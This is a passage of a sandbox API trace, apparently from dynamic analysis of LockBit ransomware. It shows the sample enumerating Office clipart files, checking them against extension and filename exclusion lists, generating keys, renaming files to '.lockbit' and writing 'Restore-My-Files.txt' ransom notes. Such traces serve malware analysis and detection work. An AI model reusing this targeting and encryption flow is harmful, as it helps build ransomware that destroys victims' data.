(in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=11404) returned 1 [0142.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.030] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.035] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.035] malloc (_Size=0xa6) returned 0x77d7a8 [0142.035] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.035] free (_Block=0x77d7a8) [0142.035] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107512.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.036] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.036] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.036] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2fac, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107514.WMF", cAlternateFileName="")) returned 1 [0142.036] lstrcmpiW (lpString1=".", lpString2="J0107514.WMF") returned -1 [0142.036] lstrcmpiW (lpString1="..", lpString2="J0107514.WMF") returned -1 [0142.036] PathFindExtensionW (pszPath="J0107514.WMF") returned=".WMF" [0142.036] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.036] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.037] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.037] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107514.WMF") returned 1 [0142.038] lstrcmpiW (lpString1="ntldr", lpString2="J0107514.WMF") returned 1 [0142.038] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107514.WMF") returned 1 [0142.038] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107514.WMF") returned -1 [0142.038] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107514.WMF") returned -1 [0142.038] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107514.WMF") returned 1 [0142.038] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107514.WMF") returned -1 [0142.038] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.038] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF") returned=".WMF" [0142.038] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.038] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.038] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.039] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.039] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.lockbit") returned 72 [0142.039] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107514.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0142.051] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.051] malloc (_Size=0x40068) returned 0x3df0008 [0142.051] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12204) returned 1 [0142.051] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.051] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0142.052] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.052] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.052] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0142.052] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.054] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.054] malloc (_Size=0xa6) returned 0x77d7a8 [0142.055] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.055] free (_Block=0x77d7a8) [0142.055] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107514.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.055] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.055] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.056] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x563ba0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x36b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107516.WMF", cAlternateFileName="")) returned 1 [0142.056] lstrcmpiW (lpString1=".", lpString2="J0107516.WMF") returned -1 [0142.056] lstrcmpiW (lpString1="..", lpString2="J0107516.WMF") returned -1 [0142.056] PathFindExtensionW (pszPath="J0107516.WMF") returned=".WMF" [0142.056] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.056] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.057] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107516.WMF") returned 1 [0142.057] lstrcmpiW (lpString1="ntldr", lpString2="J0107516.WMF") returned 1 [0142.057] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107516.WMF") returned 1 [0142.057] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107516.WMF") returned -1 [0142.057] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107516.WMF") returned -1 [0142.057] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107516.WMF") returned 1 [0142.057] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107516.WMF") returned -1 [0142.057] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0142.057] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF") returned=".WMF" [0142.057] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0142.057] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0142.058] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0142.058] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0142.058] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF.lockbit") returned 72 [0142.058] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107516.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0142.061] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0142.061] malloc (_Size=0x40068) returned 0x1ff1e60 [0142.061] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14008) returned 1 [0142.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0142.062] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.062] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.062] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0142.062] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.064] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0142.064] malloc (_Size=0xa6) returned 0x77d7a8 [0142.064] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0142.065] free (_Block=0x77d7a8) [0142.065] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107516.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0142.065] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0142.065] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0142.065] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65eb5050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1f0c, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107526.WMF", cAlternateFileName="")) returned 1 [0142.065] lstrcmpiW (lpString1=".", lpString2="J0107526.WMF") returned -1 [0142.065] lstrcmpiW (lpString1="..", lpString2="J0107526.WMF") returned -1 [0142.065] PathFindExtensionW (pszPath="J0107526.WMF") returned=".WMF" [0142.065] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0142.065] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0142.065] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0142.065] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0142.065] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0142.065] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0142.066] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0142.066] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0142.067] lstrcmpiW 